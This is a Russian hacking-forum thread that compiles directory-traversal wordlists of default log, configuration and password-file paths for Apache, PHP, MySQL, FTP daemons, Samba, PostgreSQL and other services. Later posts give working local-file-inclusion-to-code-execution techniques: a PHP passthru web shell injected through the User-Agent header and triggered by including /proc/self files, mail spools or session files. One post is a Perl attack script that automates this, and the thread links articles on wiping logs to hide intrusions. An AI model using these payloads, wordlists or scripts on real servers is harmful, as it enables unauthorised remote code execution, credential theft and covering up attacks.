Default *log, *conf files locations

Discussion in 'Уязвимости' started by ettee, 24 Sep 2007.

  1. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Apache:
    *log
    Code:
    ../../../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../../../var/log/httpd/error_log
    ../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../var/log/httpd/error_log
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../apache/logs/error.log
    ../../../../apache/logs/access.log
    ../../../../../apache/logs/error.log
    ../../../../../apache/logs/access.log
    ../apache2/logs/error.log
    ../apache2/logs/access.log
    ../../apache2/logs/error.log
    ../../apache2/logs/access.log
    ../../../apache2/logs/error.log
    ../../../apache2/logs/access.log
    ../../../../apache2/logs/error.log
    ../../../../apache2/logs/access.log
    ../../../../../apache2/logs/error.log
    ../../../../../apache2/logs/access.log
    ../logs/error.log
    ../logs/access.log
    ../../logs/error.log
    ../../logs/access.log
    ../../../logs/error.log
    ../../../logs/access.log
    ../../../../logs/error.log
    ../../../../logs/access.log
    ../../../../../logs/error.log
    ../../../../../logs/access.log
    ../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../usr/local/apache2/logs/access_log
    ../../../../../../../../../../usr/local/apache2/logs/access.log
    ../../../../../../../../../../usr/local/apache2/logs/error_log
    ../../../../../../../../../../usr/local/apache2/logs/error.log
    ../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../var/log/httpd/access_log
    ../../../../../../../../../../var/log/httpd/access.log
    ../../../../../../../../../../var/log/httpd/error_log
    ../../../../../../../../../../var/log/httpd/error.log
    ../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../var/log/apache2/access_log
    ../../../../../../../../../../var/log/apache2/access.log
    ../../../../../../../../../../var/log/apache2/error_log
    ../../../../../../../../../../var/log/apache2/error.log
    ../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../var/log/access.log
    ../../../../../../../../../../var/log/error_log
    ../../../../../../../../../../var/log/error.log
    ../../../../../../../../../../opt/lampp/logs/access_log
    ../../../../../../../../../../opt/lampp/logs/error_log
    ../../../../../../../../../../opt/xampp/logs/access_log
    ../../../../../../../../../../opt/xampp/logs/error_log
    ../../../../../../../../../../opt/lampp/logs/access.log
    ../../../../../../../../../../opt/lampp/logs/error.log
    ../../../../../../../../../../opt/xampp/logs/access.log
    ../../../../../../../../../../opt/xampp/logs/error.log
    ../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log
    ../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../apache/logs/error.log
    ../../../../apache/logs/access.log
    ../../../../../apache/logs/error.log
    ../../../../../apache/logs/access.log
    ../../../../../../apache/logs/error.log
    ../../../../../../apache/logs/access.log
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../../apache/logs/error.log
    ../../../../../../../../apache/logs/access.log
    ../../../logs/error.log
    ../../../logs/access.log
    ../../../../logs/error.log
    ../../../../logs/access.log
    ../../../../../logs/error.log
    ../../../../../logs/access.log
    ../../../../../../logs/error.log
    ../../../../../../logs/access.log
    ../../../../../../../logs/error.log
    ../../../../../../../logs/access.log
    ../../../../../../../../logs/error.log
    ../../../../../../../../logs/access.log
    ../../../../../../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../../../../../../var/www/logs/access_log
    ../../../../../../../../../../../../var/www/logs/access.log
    ../../../../../../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../../../../../../var/log/apache/access_log
    ../../../../../../../../../../../../var/log/apache/access.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/www/logs/error_log
    ../../../../../../../../../../../../var/www/logs/error.log
    ../../../../../../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../../../../../../var/log/apache/error_log
    ../../../../../../../../../../../../var/log/apache/error.log
    ../../../../../../../../../../../../var/log/access_log
    ../../../../../../../../../../../../var/log/error_log
    *conf
    Code:
    ../../../../../../usr/local/apache/conf/httpd.conf
    ../../../../../../usr/local/apache2/conf/httpd.conf
    ../../../../../../etc/httpd/conf/httpd.conf
    ../../../../../../etc/apache/conf/httpd.conf
    ../../../../../../usr/local/etc/apache/conf/httpd.conf
    ../../../../../../etc/apache2/httpd.conf
    ../../../../../../../../../usr/local/apache/conf/httpd.conf
    ../../../../../../../../../usr/local/apache2/conf/httpd.conf
    ../../../../../../../../usr/local/apache/httpd.conf
    ../../../../../../../../usr/local/apache2/httpd.conf
    ../../../../../../../../usr/local/httpd/conf/httpd.conf
    ../../../../../../../usr/local/etc/apache/conf/httpd.conf
    ../../../../../../../usr/local/etc/apache2/conf/httpd.conf
    ../../../../../../../usr/local/etc/httpd/conf/httpd.conf
    ../../../../../../../usr/apache2/conf/httpd.conf
    ../../../../../../../usr/apache/conf/httpd.conf
    ../../../../../../../usr/local/apps/apache2/conf/httpd.conf
    ../../../../../../../usr/local/apps/apache/conf/httpd.conf
    ../../../../../../etc/apache/conf/httpd.conf
    ../../../../../../etc/apache2/conf/httpd.conf
    ../../../../../../etc/httpd/conf/httpd.conf
    ../../../../../../etc/http/conf/httpd.conf
    ../../../../../../etc/apache2/httpd.conf
    ../../../../../../etc/httpd/httpd.conf
    ../../../../../../etc/http/httpd.conf
    ../../../../../../etc/httpd.conf
    ../../../../../opt/apache/conf/httpd.conf
    ../../../../../opt/apache2/conf/httpd.conf
    ../../../../var/www/conf/httpd.conf
    ../../../private/etc/httpd/httpd.conf
    ../../../private/etc/httpd/httpd.conf.default
    ../../Volumes/webBackup/opt/apache2/conf/httpd.conf
    ../../Volumes/webBackup/private/etc/httpd/httpd.conf
    ../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
    ../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf
    ../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf
    ../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf
    ../../../../../../../../../usr/local/php/httpd.conf.php
    ../../../../../../../../../usr/local/php4/httpd.conf.php
    ../../../../../../../../../usr/local/php5/httpd.conf.php
    ../../../../../../../../../usr/local/php/httpd.conf
    ../../../../../../../../../usr/local/php4/httpd.conf
    ../../../../../../../../../usr/local/php5/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
    /usr/local/etc/apache/vhosts.conf
    php.ini
    Code:
    ../../../../../../../../../etc/php.ini
    ../../../../../../../../../bin/php.ini
    ../../../../../../../../../etc/httpd/php.ini
    ../../../../../../../../../usr/lib/php.ini
    ../../../../../../../../../usr/lib/php/php.ini
    ../../../../../../../../../usr/local/etc/php.ini
    ../../../../../../../../../usr/local/lib/php.ini
    ../../../../../../../../../usr/local/php/lib/php.ini
    ../../../../../../../../../usr/local/php4/lib/php.ini
    ../../../../../../../../../usr/local/php5/lib/php.ini
    ../../../../../../../../../usr/local/apache/conf/php.ini
    ../../../../../../../../../etc/php4.4/fcgi/php.ini
    ../../../../../../../../../etc/php4/apache/php.ini
    ../../../../../../../../../etc/php4/apache2/php.ini
    ../../../../../../../../../etc/php5/apache/php.ini
    ../../../../../../../../../etc/php5/apache2/php.ini
    ../../../../../../../../../etc/php/php.ini
    ../../../../../../../../../etc/php/php4/php.ini
    ../../../../../../../../../etc/php/apache/php.ini
    ../../../../../../../../../etc/php/apache2/php.ini
    ../../../../../../../../../web/conf/php.ini
    ../../../../../../../../../usr/local/Zend/etc/php.ini
    ../../../../../../../../../opt/xampp/etc/php.ini
    ../../../../../../../../../var/local/www/conf/php.ini
    ../../../../../../../../../etc/php/cgi/php.ini
    ../../../../../../../../../etc/php4/cgi/php.ini
    ../../../../../../../../../etc/php5/cgi/php.ini
    ../../../../../../../../../php5\php.ini
    ../../../../../../../../../php4\php.ini
    ../../../../../../../../../php\php.ini
    ../../../../../../../../../PHP\php.ini
    ../../../../../../../../../WINDOWS\php.ini
    ../../../../../../../../../WINNT\php.ini
    ../../../../../../../../../apache\php\php.ini
    ../../../../../../../../../xampp\apache\bin\php.ini
    ../../../../../../../../../NetServer\bin\stable\apache\php.ini
    ../../../../../../../../../home2\bin\stable\apache\php.ini
    ../../../../../../../../../home\bin\stable\apache\php.ini
    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
    
    Cpanel:
    *log
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /usr/local/cpanel/logs/stats_log
    *conf
    /var/cpanel/cpanel.config

    MySQL:
    *log
    /var/log/mysql/mysql-bin.log
    /var/log/mysql.log
    /var/log/mysqlderror.log
    /var/log/mysql/mysql.log
    /var/log/mysql/mysql-slow.log
    /var/mysql.log
    *conf
    /var/lib/mysql/my.cnf
    /etc/mysql/my.cnf
    /etc/my.cnf

    MySQL(Windows):
    *log
    Code:
    C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
    C:\Program Files\MySQL\data\hostname.err
    C:\Program Files\MySQL\data\mysql.log
    C:\Program Files\MySQL\data\mysql.err
    C:\Program Files\MySQL\data\mysql-bin.log
    C:\MySQL\data\hostname.err
    C:\MySQL\data\mysql.log
    C:\MySQL\data\mysql.err
    C:\MySQL\data\mysql-bin.log
    *conf
    Code:
    C:\Program Files\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
    C:\Program Files\MySQL\my.ini
    C:\Program Files\MySQL\my.cnf
    C:\MySQL\my.ini
    C:\MySQL\my.cnf
    Mod Security:
    *log
    /usr/local/apache/logs/audit_log
    /logs/security_debug_log
    /logs/security_log
    *conf
    /usr/local/apache/conf/modsec.conf


    FTP:


    ProFTPD:
    *log
    /etc/logrotate.d/proftpd
    /www/logs/proftpd.system.log
    /var/log/proftpd
    *conf
    /etc/proftp.conf
    /etc/protpd/proftpd.conf
    /etc/vhcs2/proftpd/proftpd.conf
    /etc/proftpd/modules.conf

    vsftpd:
    *log
    /var/log/vsftpd.log
    /etc/vsftpd.chroot_list
    /etc/logrotate.d/vsftpd.log
    *conf
    /etc/vsftpd/vsftpd.conf
    /etc/vsftpd.conf
    /etc/chrootUsers

    wu-ftpd:
    *log
    /var/log/xferlog
    /var/adm/log/xferlog
    *conf
    /etc/wu-ftpd/ftpaccess
    /etc/wu-ftpd/ftphosts
    /etc/wu-ftpd/ftpusers

    Pure-FTPd:
    *conf
    /usr/sbin/pure-config.pl
    /usr/etc/pure-ftpd.conf
    /etc/pure-ftpd/pure-ftpd.conf
    /usr/local/etc/pure-ftpd.conf
    /usr/local/etc/pureftpd.pdb
    /usr/local/pureftpd/etc/pureftpd.pdb
    /usr/local/pureftpd/sbin/pure-config.pl
    /usr/local/pureftpd/etc/pure-ftpd.conf
    -/etc/pure-ftpd.conf
    /etc/pure-ftpd/pure-ftpd.pdb
    /etc/pureftpd.pdb
    /etc/pureftpd.passwd
    /etc/pure-ftpd/pureftpd.pdb
    DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
    OpenBSD: /usr/ports/net/pure-ftpd/
    NetBSD: /usr/pkgsrc/net/pureftpd/
    Crux Linux: /usr/ports/contrib/pure-ftpd/
    *log
    /var/log/pure-ftpd/pure-ftpd.log
    /logs/pure-ftpd.log
    /var/log/pureftpd.log

    Other:
    /var/log/ftp-proxy/ftp-proxy.log
    /var/log/ftp-proxy
    /var/log/ftplog
    /etc/logrotate.d/ftp
    /etc/ftpchroot
    /etc/ftphosts


    Mail server:
    Exim:
    *log
    /var/log/exim_mainlog
    /var/log/exim/mainlog
    /var/log/maillog
    /var/log/exim_paniclog
    /var/log/exim/paniclog
    /var/log/exim/rejectlog
    /var/log/exim_rejectlog

    Информация к размышлению:
    - Выполнение команд через локальный инклюд
    - Логи для умных
    - ЗАМЕТАЕМ СЛЕДЫ В LINUX
    - Скажи логам нет!
    - В борьбе с журнальными бестиями
    - Боремся с логами в *nix
    - Боремся с логами в *nix #2
    - Бортжурнал юниксоида
    - О взломе лог файлов
    thx [53x]Shadow
     
    _________________________
  2. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508

    В аттаче - элементарная утилитка для проверки GET инклудов.

    Если у вас есть РАСПРОСТРАНЕННЫЙ ПУТЬ отстуствующий в списке - запостите его.
     

    Attached Files:

  3. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    Значит, помниццо были разговоры про то что при инклуде логов возникают проблемы и т.п.

    В error_log часто пишется "Referer".

    В access_log - "User-Agent".

    И касательно мифа по тому что символы < > кодируюццо в URL аналоги и "ничего не сделаешь" - запустите любой http-снифер и вы увидите, что это браузер виноват - он автоматом переводит символы в урл.
    Просто пошлите пакет любой тулзой типа AccessDriver.
     
  4. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    ...

    Code:
    ../../../../../../usr/local/apache/bin/httpd
    ../../../../../../../../../usr/local/apache/conf/httpd.conf.default
    ../../../../../../../../etc/httpd/logs/access_log
    ../../../../../../../../etc/httpd/logs/access.log
    ../../../../../../../../../usr/local/apache/conf/access.conf
    
     
  5. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    MuddleFTPD

    *log
    Code:
    /var/log/muddleftpd
    /usr/sbin/mudlogd
    /etc/muddleftpd/mudlog
    *conf
    Code:
    /etc/muddleftpd.com
    /etc/muddleftpd/mudlogd.conf
    /etc/muddleftpd/muddleftpd.conf
    /var/log/muddleftpd.conf
    /usr/sbin/mudpasswd
    /etc/muddleftpd/muddleftpd.passwd
    /etc/muddleftpd/passwd
     
    _________________________
  6. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    В большенстве случаев сервер под управлением Win NT хранит свои лог файлы в следующих директориях:

    HTTP:
    %SystemRoot%\system32\logfiles\W3SVC#(W3SVC1,W3SVC2,W3SVC3...)\
    FTP:
    %SystemRoot%\system32\logfiles\MSFTPSVC#(MSFTPSVC4,MSFTPSVC5...)\
    SMTP:
    %SystemRoot%\system32\logfiles\SMTPSVC#(SMTPSVC1,SMTPSVC2...)\

    # -обозначает номер веб-сайта(номер узла) (по умолчанию равен "1")

    Имя файла соответствует его дате создания: in02039.log (2002 9-ое марта)

    Примечание по типам журнулов:
    IIS аббревиатурой служит "in"
    W3C аббревиатурой служит "ex"
    NCSA аббревиатурой служит "nc"

    Отчёты стандартного Firewall'а:
    %SystemRoot%\system32\logfiles\Firewall\pfirewall.log
    %SystemRoot%\system32\logfiles\Firewall\pfirewall.log.old
     
    _________________________
  7. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    lighthttpd

    *log
    /var/log/lighttpd.error.log
    /var/log/lighttpd.access.log
    /var/lighttpd.log
    /var/logs/access.log
    /var/log/lighttpd/
    /var/log/lighttpd/error.log
    /var/log/lighttpd/access.www.log
    /var/log/lighttpd/error.www.log
    /var/log/lighttpd/access.log
    /usr/local/apache2/logs/lighttpd.error.log
    /usr/local/apache2/logs/lighttpd.log
    /usr/local/apache/logs/lighttpd.error.log
    /usr/local/apache/logs/lighttpd.log
    /var/log/lighttpd.access.log
    /var/log/lighttpd.error.log
    /usr/local/lighttpd/log/lighttpd.error.log
    /usr/local/lighttpd/log/access.log
    /var/log/lighttpd/mydomain/access.log
    /var/log/lighttpd/mydomain/error.log
    /usr/home/user/var/log/lighttpd.error.log
    /usr/home/user/var/log/apache.log

    *conf

    /home/user/lighttpd/lighttpd.conf
    /usr/home/user/lighttpd/lighttpd.conf
    /etc/lighttpd/lighthttpd.conf
    /usr/local/etc/lighttpd.conf
    /usr/local/lighttpd/conf/lighttpd.conf
    /usr/local/etc/lighttpd.conf.new
    /var/www/.lighttpdpassword

    Samba
    *conf
    /etc/smbpasswd
    /etc/smb.conf
    /etc/samba/smb.conf
    /etc/samba/samba.conf
    /etc/samba/smb.conf.user
    /etc/samba/smbpasswd
    /etc/samba/smbusers
    /etc/samba/private/smbpasswd
    /etc/samba/smb.conf.198.166.0.5
    /usr/local/samba/lib/smb.conf.198.166.0.5
    /usr/local/etc/smb.conf
    /usr/local/samba/lib/smb.conf.user
    /daten/home/gr-user



    *log
    /usr/local/samba/lib/log.user
    /usr/local/logs/samba.log
    /usr/local/samba/lib/log.198.166.0.5
    /var/log/samba/log.smbd
    /var/log/samba/log.nmbd
    /var/log/samba.log
    /var/log/samba.log1
    /var/log/samba.log2
    /var/log/samba/samba_198.166.0.5.log
    /var/log/samba/198.166.0.5.log
    /var/log/samba.198.166.0.5
    /var/log/samba.log.198.166.0.5
    /var/log/samba/198.166.0.5
    /var/log/log.smb
    /var/log/samba-log.198.166.0.5
    /etc/samba/netlogon
     
    _________________________
  8. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    PostgreSQL

    *log
    /var/postgresql/log/postgresql.log
    /var/log/postgresql/postgresql.log
    /var/log/postgres/pg_backup.log
    /var/log/postgres/postgres.log
    /var/log/postgresql.log
    /var/log/pgsql/pgsql.log
    /var/log/postgresql/postgresql-8.1-main.log
    /var/log/pgsql8.log
    /var/log/postgresql/postgres.log
    /var/log/pgsql_log
    /var/log/postgresql/main.log
    /var/log/cron /var/log/postgres.log
    /usr/internet/pgsql/data/postmaster.log
    /usr/local/pgsql/data/postgresql.log
    /usr/local/pgsql/data/pg_log
    c:\PostgreSQL\log\pgadmin.log

    *conf
    /var/lib/pgsql/data/postgresql.conf
    /var/postgresql/db/postgresql.conf
    /var/nm2/postgresql.conf
    /usr/local/pgsql/data/postgresql.conf
    /usr/local/pgsql/data/pg_hba.conf
    /usr/internet/pgsql/data/pg_hba.conf
    /usr/local/pgsql/data/passwd
    /usr/local/pgsql/bin/pg_passwd
    /etc/postgresql/postgresql.conf
    /etc/postgresql/pg_hba.conf
    /home/postgres/data/postgresql.conf
    /home/postgres/data/PG_VERSION
    /home/postgres/data/pg_ident.conf
    /home/postgres/data/pg_hba.conf

    Error Reporting and Logging
     
    _________________________
  9. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    ipfw (BSD)

    *log
    /var/log/ipfw.log
    /var/log/ipfw
    /var/log/ipfw/ipfw.log
    /var/log/ipfw.today


    *conf

    /etc/ipfw.rules
    /etc/ipfw.conf
    /etc/firewall.rules
     
    _________________________
  10. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    *обновление постов.

    Структура архива:
    _all_apache.log.txt
    _all_httpd.conf.txt
    _all_log.txt -LAMPP, XAMPP, Apache.
    _all_php.ini.txt
    _all_mysql.txt
    _all_mysql_win.txt
    _all_cpanel.txt
    _all_modsecurity.txt
    _all_ftp.txt -ProFTPD, vsftpd, wu-ftpd,Pure-FTPd, MuddleFTPD.
    _all_samba.txt
    _all_lighthttpd.txt
    _all_postgresq.txt
     

    Attached Files:

    _________________________
  11. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    1) юзаем логи, не зная к ним пути

    a. /proc/%{PID}/fd/%{FD_ID}

    %{PID} - пид
    %{FD_ID} - ярлыки, (1,2,3,..,9) 2 и 7 логи апача (не факт что всегда, у меня были тоже 2 и 7)

    /proc/self/status - смотрим пид
    /proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2

    index.php?inc=../../../../../proc/3661/fd/2
    User-Agent: <?php passthru($_GET['cmd']) ?>

    Code:
    dr-x------ 2 www-data www-data  0 Jan  2 18:27 .
    dr-xr-xr-x 6 www-data www-data  0 Jan  2 18:27 ..
    lr-x------ 1 www-data www-data 64 Jan  2 18:27 0 -> /dev/null
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 1 -> pipe:[3113414]
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 2 -> /var/log/apache2/error.log
    lrwx------ 1 www-data www-data 64 Jan  2 18:27 3 -> socket:[2714910]
    lr-x------ 1 www-data www-data 64 Jan  2 18:27 4 -> pipe:[2714921]
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 5 -> pipe:[2714921]
    l-wx------ 1 www-data www-data 64 Jan  2 18:27 6 -> /var/log/apache2/access.log
    lrwx------ 1 www-data www-data 64 Jan  2 18:27 7 -> /anon_inode:[eventpoll]
    lrwx------ 1 www-data www-data 64 Jan  2 18:27 8 -> socket:[2742717]
    lr-x------ 1 www-data www-data 64 Jan  2 18:27 9 -> /proc/27262/fd
    b. напрямую
    index.php?inc=../../../../../proc/self/fd/2
    User-Agent: <?php passthru($_GET['cmd']) ?>

    2) переменные окружения (если неправильно понял - поправьте)
    index.php?inc=../../../../../proc/self/environ
    POST:
    User-Agent: <?php passthru($_GET['cmd']) ?>

    3) mail
    PHP:
    <? 
    mail("ololo@localhost""<?php passthru(\$_GET['cmd']) ?>""fuckme");
    ?>
    index.php?inc=../../../../../var/mail/ololo
    index.php?inc=../../../../../var/spool/mail/ololo


    зы.
    /proc/version
    /proc/self/cmdline
    /proc/devices


    по мотивам
    Code:
    http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
    http://www.milw0rm.com/papers/260
    http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx
     
    _________________________
  12. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Скрипт для поиска путей логов Apache

    Code:
    #! /usr/bin/perl
    
    # perl script to serach apache logs path
    # Example: 
    #   URL: http://site/index.php
    #   Variable: file
    #   Method: POST
    #
    # by Pepelux (pepelux[at]enye-sec[dot]org)
    
    use LWP::UserAgent;
    $ua = LWP::UserAgent->new;
    
    my ($host, $var, $method) = @ARGV ;
    
    unless($ARGV[2]) {
       print "Usage: perl $0 <url> <vulnerable_var> <method>\n";
       print "\tex: perl $0 http://site.com/index.php file GET\n";
       print "\tex: perl $0 http://site.com/index.php file POST\n\n";
       exit 1;
    }
    
    $ua->agent("<? passthru(\$_GET[cmd]) ?>");
    $ua->timeout(10);
    $host = "http://".$host if ($host !~ /^http:/);
    
    if ($method =~ /GET/) {
      $url = $host."?".$var."=../../../../proc/self/stat%00";
      $req = HTTP::Request->new(GET => $url);
      $req->header('Accept' => 'text/html');
    }
    else {
      $req = HTTP::Request->new(POST => $host);
      $req->content_type('application/x-www-form-urlencoded');
      $req->content($var."=../../../../proc/self/stat%00");
    }
    
    $res = $ua->request($req);
    
    if ($res->is_success) { 
      $result = $res->content;
      $result =~ s/<[^>]*>//g;
      $x = index($result, " ", 0);
      $pid = substr($result, 0, $x);
    
      print "Apache PID: ".$pid."\n";
    }
    
    if ($method =~ /GET/) {
      $url = $host."?".$var."=../../../../proc/self/status%00";
      $req = HTTP::Request->new(GET => $url);
      $req->header('Accept' => 'text/html');
    }
    else {
      $req = HTTP::Request->new(POST => $host);
      $req->content_type('application/x-www-form-urlencoded');
      $req->content($var."=../../../../proc/self/status%00");
    }
    
    $res = $ua->request($req);
    
    if ($res->is_success) { 
      $result = $res->content;
      $result =~ s/<[^>]*>//g;
      $x = index($result, "FDSize",0)+8;
      $fdsize = substr($result, $x, 3);
    
      print "FD_SIZE: ".$fdsize."\n";
    }
    
    for ($cont = 0; $cont < $fdsize; $cont++) {
      $file = "../../../../proc/".$pid."/fd/".$cont;
      open FILE, $file;
    
      while(<FILE>) {
        if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) {
          print "FD: ".$cont."\n";
          exit;
        }
      }
    }
    
     
  13. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    немного проверил то что c411k написал - mail файл доступен только юзеру чей mail, так что чтоб прочитать нужен и апач под тем же юзером, всяким www,nobody,apache запрещается по дефолту иметь ящик,
    /proc/self/environ у меня пустой , не знаю как будет при php в cgi моде, лог файлы да читаются на ура только если прав хватит, проверил на других хостах - только рут может логи читать (, потом еще через файл сессии можно инклуд сделать у меня он находится в /proc/self/fd/10
     
  14. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Рассмотрим ситуацию, когда уникальному пользователю присваивается SID (Session IDentifier) идентификатор, без какой либо фильтрации входящего содержимого,
    Независимо от его способа передачи(Cookie/Query string), на сервере будет создан "файл сеанса", при условии что session.save_handler соответствует значение files, в каталоге определенной директивой session.save_path. Главным плюсом является то, что обслуживание хостов на сервере будет производится одним процессом.

    Session.save_path:
    /tmp/sess_<session_id>
    /php_sess/sess_<session_id>
    /tmp/php-sess/sess_<session_id>
    /home/%username%/tmp/sess_<session_id>

    ../../../../tmp/sess_7083093d3b1e818d5c86c79b0f62a374&cmd=id
     
    _________________________
  15. f1rebl00d

    f1rebl00d Elder - Старейшина

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    osx

    httpd conf
    /etc/osxhttpd/osxhttpd.conf
    /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf

    osx site conf
    /etc/apache2/sites/*.conf"
    /etc/httpd/sites/000[1...]_[IP]_[PORT]_[SITE_NAME].conf

    Пример: 0002_18.80.2.252_80_meche.mit.edu.conf

    default site dir
    /Library/WebServer/Documents/

    Webmin

    conf
    /usr/local/etc/webmin/miniserv.conf
    /etc/webmin/miniserv.conf
    /usr/local/etc/webmin/miniserv.users
    /etc/webmin/miniserv.users

    log
    /var/log/webmin/miniserv.log
     
  16. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    SquirrelMail


    *log
    /usr/share/squirrelmail/plugins/squirrel_logger/setup.php
    $sl_logfile = "/var/log/squirrelmail.log";

    /var/log/apache2/squirrelmail.log
    /var/log/apache2/squirrelmail.err.log
    /var/lib/squirrelmail/prefs/squirrelmail.log
    /var/log/squirrelmail.log
    /var/log/mail.log

    ls:
    #ls /usr/local/squirrelmail/www/
    Code:
    AUTHORS    configure  doc        include    plugins      src
    ChangeLog  contrib    functions  index.php  po            themes
    class      COPYING    help      INSTALL    README        UPGRADE
    config    data      images    locale    ReleaseNotes
    # ls /var/local/squirrelmail/
    Code:
    attach  data
    # ls /etc/squirrelmail/
    Code:
    apache.conf        config_local.php  default_pref      index.php
    config_default.php  config.php        filters_setup.php  sqspell_config.php
    *conf
    /etc/squirrelmail/config/config.php
    /etc/squirrelmail/config.php
    /etc/httpd/conf.d/squirrelmail.conf
    /usr/share/squirrelmail/config/config.php
    /private/etc/squirrelmail/config/config.php
    /srv/www/htdos/squirrelmail/config/config.php
    /var/www/squirrelmail/config/config.php
    /var/www/html/squirrelmail/config/config.php
    /var/www/html/squirrelmail[Version]/config/config.php (/var/www/html/squirrelmail-1.2.9/config/config.php)

    Plugin
    /etc/squirrelmail/plugins
    /usr/share/squirrelmail/plugins

    /usr/share/squirrelmail/config/config.php
    $plugins[1] = 'squirrel_logger';
    $plugins[2]
    ...
     
    _________________________
  17. winterfrost

    winterfrost Elder - Старейшина

    Joined:
    18 Aug 2008
    Messages:
    42
    Likes Received:
    18
    Reputations:
    15
